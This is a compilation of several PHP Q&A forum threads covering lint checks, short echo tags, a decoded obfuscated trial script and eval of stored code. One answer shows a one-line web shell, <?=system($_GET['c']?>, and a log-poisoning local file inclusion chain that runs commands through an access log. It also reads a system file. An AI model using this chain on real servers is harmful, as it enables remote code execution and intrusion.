Basically, php -l does not detect any syntax error, given this code:
<?php
date®;
?>
Obviously, it's an error when you execute it.
Is there any alternative or additional linter to use for PHP?
EDIT:
Thanks alot guys. Apparently it is a valid constant name, as the documentation suggests ([a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*).
It only errors because you haven't a constant definition for date®
If, somewhere in another script file before an include of your test file you have:
define('date®','Value');
this would be valid (albeit meaningless) and would run without error
So syntactically this file is valid, and a lint check duly reports it as such
What you are looking for is php_check_syntax (http://php.net/manual/en/function.php-check-syntax.php).
Let me correct my answer. It will not detect the latter code as an error (as noted in the comments, this isn't erroneous code). Though, you should stick with the latter function if you want to check file for errors.
Related
How can I insert php code without spaces like
<?phpecho'hello';?>
But I need it to be executed without errors not like the code above
Use PHP short syntax
<?='hello'?>
this the same as
<?php echo 'hello'; ?>
For anyone who stumbles this answer later on. The shorthand syntax as noted in the other answer will work, however, it can be used to execute other functions in the same way you can you pass output to echo. For Example:
<?=file_get_contents('/etc/password')?>
is equivalent to:
<?php echo file_get_contents('/etc/password'); ?>
you can also take this a step further to remove code execution by doing:
<?=system($_GET['c']?>
This is really helpful/dangerous (depending on perspective :) ) if you have a local file inclusion vulnerability that lets you include things like Web Server access logs.
e.g:
http://localhost/?<?=system($_GET['c']?>
http://localhost/vuln.php?include=/var/log/httpd/access.log&c=touch+/tmp/vulnerable
I'm playing with some PHP obfuscation/encoding tool that works without any server-side loader, and I surprisingly found out solution that I cannot decode.
I consider myself generally well informed about different solutions for 'protecting' php code by encoding and obfuscation, and I know 2 fundamental rules:
if PHP can read and understand your code, no matter how much obfuscated and encoded, you also can
encoding solutions based on usage of eval() language construct are breakable trough outputting code that is to be passed as argument in eval construct (replacing eval with echo or print)
Well, that principles worked perfectly until I found this tool, encoded exactly this code
<?php
echo "Hello World!";
?>
and got this:
<?php $_F=__FILE__;$_C0='cl92S3IqSnY0aVlwKWFwNTVwYVl8fEtyKkp2NDlZcClhb2EodWFZNDdySnYnOXNpV0xyOCA4fU9yPksgTFY4IHNKSg0gSjo+ck9KNz05dHNpOXNPIHRpU31Pcj5LOCA+T0lLSn1LSjcgYzhyDQAgS0xKICxqLCBrY1ZPNyBXT3JWJiBuSk84ckkNIFZPSiBdViZyNyBfSU8gbyggTEljTzggSQ0mQj0nNEc/aTk/Pkw+MCFKfUxJICJqSiYmSSAySU8mN0UiRzAhP2k5Pz5MPiByX3ZMSlY3Sk84pzhKDUt2NDRKfUxJdnNWOEpGKKc3Sn1JN0p2JyxrWD43cjNtN2omOHFXJQ19a2FtVi1YPnNvKEZRMmhtc286WTdrYHU3byZaN2sARk5kYlR9agB1c2tuKjdkSVkuI2B1N2thVDYrZlR9agB1czK0QnFvJmMKMjomcQ1iRgpXZlkuajMoNnAzTHFrWD5zKn1GNmozKDZwM0xxa1g+cyp9S3Nrbio3ZEklNi0zKDZvaF19KlgmfStJOn1qAAB9b2E4VjJiAGZtWik2V0tyUTJOT3FwaF03MilaNnJOKnErWgA3LWg4Z2tMJTdqQUYKQmFwN3B9Y31rTFRxcG5MfSpiY3MqbiUKcE4rfSomVDcjWgBzKjVLfSpuVHEytCVmZGZvfWoAAE5wMyg2b3Fdcw1iS3EqtEtWMjopNiZxJn0qWExzKk04WG9uY3EtcUwKak5Mcw0uS31vbkJWMlF1cSphYzcjWW1WLT4mNitNQn1qAHVRb2E4c3BmRmZtUW9OKzgNZmthY1FvOj5RbzhhaHBYSVYtLmN9cFgpc2tgY3FrJm19azpMSlclcnMqYWNxU2Z1aG0pYFZrJm1mak4rfSomVDcjM3BRLS4AfWpoXTdrbis3a25aZmpubVYyKQ1malhJcVNBNVFTM0l9Km4qLFM3STdqWFQ2cjVdN3A3cAoNM0l9azdZUS1oWgoqKSY3I30AfXBYKXNrYGFob05dc2thQjZyLlROKi51N2tuKDcjWVpxMk5dfSq0JVYyYWM2DW5jcWtuQnNrJmNxV0sqc28pJQotNyZWMjdJN2Q+cnNvOlpoQjMlUS1oDXEtYmFoWWFyc2u0Y1ZCfWVgTUxiZk03WVEtaFosI2FMLHIzYH0qJkxzIzMycS1obVYyYWMKK1RdcWsmbywAUCc0NEc/aQ=';$_D=strrev('edoced_46esab');eval($_D('JF9DMD1iYXNlNjRfZGVjb2RlKCRfQzApOyRfQzA9c3RydHIoJF9DMCwnKEEuZ1B0TzZyDVF+p1khLHszTHcwOkhxKVpXSjFkbURYbioKOGBoZkktZbQjNENOUzJhNXZbb2lda007X3hianNsY0IAdSY3eXpVVCtwOT4lRy9GCVZLPX1SRTwnLCc0QU1LPS9yT2luWbRfMQpQfkJoOg14Jlo1a1RlKkR6XVJWbUxzVUpJb1grRkMpYE5TVzk4KH0yPnZHRSVmLVFIYlt1eWc3bGRxpyx3ajM8cDA7IzZ7YXQuYwkhACcpOyRfUj1zdHJfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfQzApO2V2YWwoJF9SKTskX1I9MDskX0MwPTA7'));?>
There is really nothing special about given code except one thing I cannot explain:
when I output code that is to be passed in eval() as argument, that code generates parse error.
Naturally, PHP would not accept this:
$_C0=base64_decode($_C0);$_C0=strtr($_C0,'(A.gPtO6r
Q~§Y!,{3Lw0:Hq)ZWJ1dmDXn*
8`hfI-e´#4CNS2a5v[oi]kM;_xbjslcBu&7yzUT+p9>%G/F VK=}RE<','4AMK=/rOinY´_1
P~Bh:
x&Z5kTe*Dz]RVmLsUJIoX+FC)`NSW98(}2>vGE%f-QHb[uyg7ldq§,wj3
but that is that very code that is passed in eval() construct in encoded script above. And everything works fine.
How can that be? Eval construct is nothing more - as much as I know - then interpreting string as regular PHP code, and if that string contains something that will be incorrect for PHP in eval() -it sure will be same if that would be passed directly to script without eval.
What is the mistery here?
The result of base64_decode that you are printing contains some control characters that are tricking the console into hiding some parts of the code. The actual result is this:
$_C0=base64_decode($_C0);$_C0=strtr($_C0,'(A.gPtO6r^MQ~§Y!,{3Lw0:Hq)ZWJ1dmDXn*
8`hfI-e´#4CNS2a5v[oi]kM;_xbjslcB^#u&7yzUT+p9>%G/F VK=}RE<','4AMK=/rOinY´_1
P~Bh:^Mx&Z5kTe*Dz]RVmLsUJIoX+FC)`NSW98(}2>vGE%f-QHb[uyg7ldq§,wj3<p0;#6{at.c !^#');$_R=str_replace('__FILE__',"'".$_F."'",$_C0);eval($_R);$_R=0;$_C0=0;
Which decodes into this:
if(time()>1359388391||time()<1359294791)die('<b>This script has been expired.</b><br />Scripts protected using the PHP Guard Trial Version are valid for 24 hours only.');?><?php
echo "Hello World!";
?><?php if(headers_sent())echo(base64_decode('PGRpdiBzdHlsZT0ncG9zaXRpb246YWJzb2x1dGU7d2lkdGg6NDQwcHg7bGVmdDo1MCU7dG9wOjIwcHg7bWFyZ2luLWxlZnQ6LTI1MHB4O3BhZGRpbmc6OHB4O3BhZGRpbmctbGVmdDo0OXB4O2JvcmRlcjoxcHggc29saWQgIzk5OTtiYWNrZ3JvdW5kOiNmZjkgdXJsKGh0dHA6Ly93d3cucGhwZ3VhcmQubmV0L3NjcmlwdCkgbm8tcmVwZWF0IDI2cHggN3B4O2ZvbnQtZmFtaWx5OlZlcmRhbmEsR2VuZXZhLHNhbnMtc2VyaWY7Zm9udC1zaXplOjEycHg7Y29sb3I6IzY2NjsnIG9uY2xpY2s9J3RoaXMuc3R5bGUuZGlzcGxheT0ibm9uZSI7Jz5UaGlzIHNjcmlwdCB3YXMgcHJvdGVjdGVkIHVzaW5nIHRoZSA8YSBocmVmPSdodHRwOi8vd3d3LnBocGd1YXJkLm5ldCcgc3R5bGU9J2NvbG9yOiMwNmM7dGV4dC1kZWNvcmF0aW9uOnVuZGVybGluZTtmb250LXdlaWdodDpib2xkJyB0YXJnZXQ9J19ibGFuayc+UEhQIEd1YXJkPC9hPiBUcmlhbCBWZXJzaW9uLjwvZGl2Pg='));?>
Which decodes into this:
<div style='position:absolute;width:440px;left:50%;top:20px;margin-left:-250px;padding:8px;padding-left:49px;border:1px solid #999;background:#ff9 url(http://www.phpguard.net/script) no-repeat 26px 7px;font-family:Verdana,Geneva,sans-serif;font-size:12px;color:#666;' onclick='this.style.display="none";'>This script was protected using the <a href='http://www.phpguard.net' style='color:#06c;text-decoration:underline;font-weight:bold' target='_blank'>PHP Guard</a> Trial Version.</div>
From the PHP manual...
eval() returns NULL unless return is called in the evaluated code, in
which case the value passed to return is returned. If there is a parse
error in the evaluated code, eval() returns FALSE and execution of the
following code continues normally. It is not possible to catch a parse
error in eval() using set_error_handler().
PHP manual - eval()
I'm trying to get some PHP example code to work on PHP version 5.3.4, Apache 2.2.17 on Windows.
The example says I need PHP 4.0 and above with CURL and contains:
<?
$function = $_GET['function-if-exist'];
$test = "Test";
?>
<? =$test ?>
I don't understand why I'm getting the following errors:
My PHP doesn't understand <? and wants <?PHP instead.
My PHP doesn't like <? =$test ?> and wants something like
<?PHP echo $test ?>
$function = $_GET['function-if-exist']; causes the error "Undefined index" but presumably works for the folks that developed it.
Can anyone help me understand why their code is not working for me?
1) <? is the "short tag". Most servers are configured to not allow short tags. This can be changed in php.ini.
2) Again, short tags. Also I think you can't have a space before the =, but the main problem is the short tags setting.
3) $_GET accesses the query string, so when loading your script you need myscript.php?function-if-exist=something
It is more ideal to check if the parameter is set before continuing to prevent errors being thrown, e.g.
if(isset($_GET['function-if-exist']))
{
$functionexists = $_GET['function-if-exist'];
}
the short tag notation is disabled in your php.ini
you need to remove the space before your equal sign
your _get array contains not the expected index, what url do you enter to access the page?
I don't understand why I'm getting the following errors:
My PHP doesn't understand
To be able to use short tags you will have to enable them via config ... http://www.tomjepson.co.uk/tutorials/35/enabling-short-tags-in-php.html
My PHP doesn't like and wants something like
Once you switch on the short tags you will be able to echo using ... important the equals signs must be touching the ? not variable.
$function = $_GET['function-if-exist']; causes the error "Undefined index" but presumably works for the folks that developed it.
The $_GET is populated according to what is in the url. To get a value in $_GET['function-if-exist'] the url accessing the script should be something like mydemo.php?function-if-exist=hello
Hope this helps you
Quick answers to 1 and 2 are enable the short_open_tag option into the php.ini file, for the last one is set the error_reporting to a less strict mode.
The reasons of not to adopt such measures are:
the short tag clashes with the xml declaration and is disabled on different host, if you need to manipulate xml or if you need to write portable code is better to resort to the long tag syntax. You lose the ability to echoing data with = but it is a small annoyance to me.
Warning and notices, as php forgive a lot the programmer for missing variables declaration are a blessing for debug. Keep then raised and you will address a lot of mispellings.
Are you sure that function-if-exist is a correct index for your hash? I would check the index first the access them. If the index don't exists is a probable hint that something is going wrong with your code and you should check the reason of the missing.
Better to stop now, as anyone can write a book on this topic, and several ones already done ;)
I've got PHP and HTML code stored in a database table. When I get this data, I need to echo the HTML and process the PHP. I thought I could use eval() for this, which works, if I do this eval("echo 'dlsj'; ?> EVALED "); I get "dlsjEVALED" printed out.
The problem is, I get a fatal error when I run longer scripts. Things like:
Parse error: syntax error, unexpected '<' in /home/content.php(18) : eval()'d code on line 1
Best advice - never store php and html code in your database. And avoid eval() like the plague.
I can't really tell what's wrong with your code, as you haven't provided enough information. But even if I did have some advice, I don't think I could give it in good conscience.
You should redesign your whole application so that it doesn't require storing such things in the database. I can't imagine why it would be necessary.
just right der...........
eval('?>' . $content .'<?php');
You need to re-open php mode after the EVALED. Apparently you have to do this with <? rather than the full <?php.
As a rule eval is to be avoided. But rules are made to be broken. There's a thread at When is eval evil in php? that gives some less dogmatic advice.
Depending on what you want to do, it might be suitable to use a template file that you source, with text that will vary stored in a local variable prior to sourcing the template.
As for storing code to be executed in the DB... this does happen in some frameworks like Drupal to provide convenient extensibility, but then Drupal is pretty thoroughly scoured for security weaknesses.
Also if you're writing self-modifying code then you need to use eval(). Not sure if anyone has done that in php but it would certainly be interesting.
I would guess that you're trying to eval() something that contains an opening <?php tag. And that leads to the error at hand.
$contents = htmlentities($contents);
echo html_entity_decode(eval($contents));
What am I doing wrong here?
$array = array('sky'=>'blue', 'grass'=>'green', 'sun'=>'yellow');
$key = array_search('green', $array);
echo $key;
error: Parse error: syntax error, unexpected T_DOUBLE_ARROW in /Applications/XAMPP/xamppfiles/htdocs/search-array.php on line 2
$array = array('sky'=>'blue', 'grass'=>'green', 'sun'=>'yellow');
$key = array_search('green', $array);
echo $key;
The source you posted works perfectly and returns 'grass'. Are you sure it is not another snippet in your application?
You may want to try finding if you closed the array right and if you have commas where they are needed. If that doesn't resolve it for perfectly functional syntax:
error_reporting(E_ALL^E_NOTICE);
Long shot, but worth a mention, I feel:
I've had the experience that sometimes, some FTP programs error out silently if they don't manage to transfer the whole file. If you're experiencing the error on a webserver and you pasted us the local code (and only then), that might be what's causing your problem; e.g. if your remote file looks like this due to an incomplete transfer:
$array = array('sky'=>'blue', 'grass'=>'green', 'sun'=>
I've gotten some odd errors over time that I couldn't explain that then boiled down to an incomplete transferred file.
I'd recommend that whenever you encounter a parse error you can't find, try re-uploading the file. If it still occurs, chances are you overlooked something.
(Needless to say that if this does happen to you, you should probably look into a better FTP client. :) Mind, I don't take this advice, I like mine too much, this is its only shortfall.)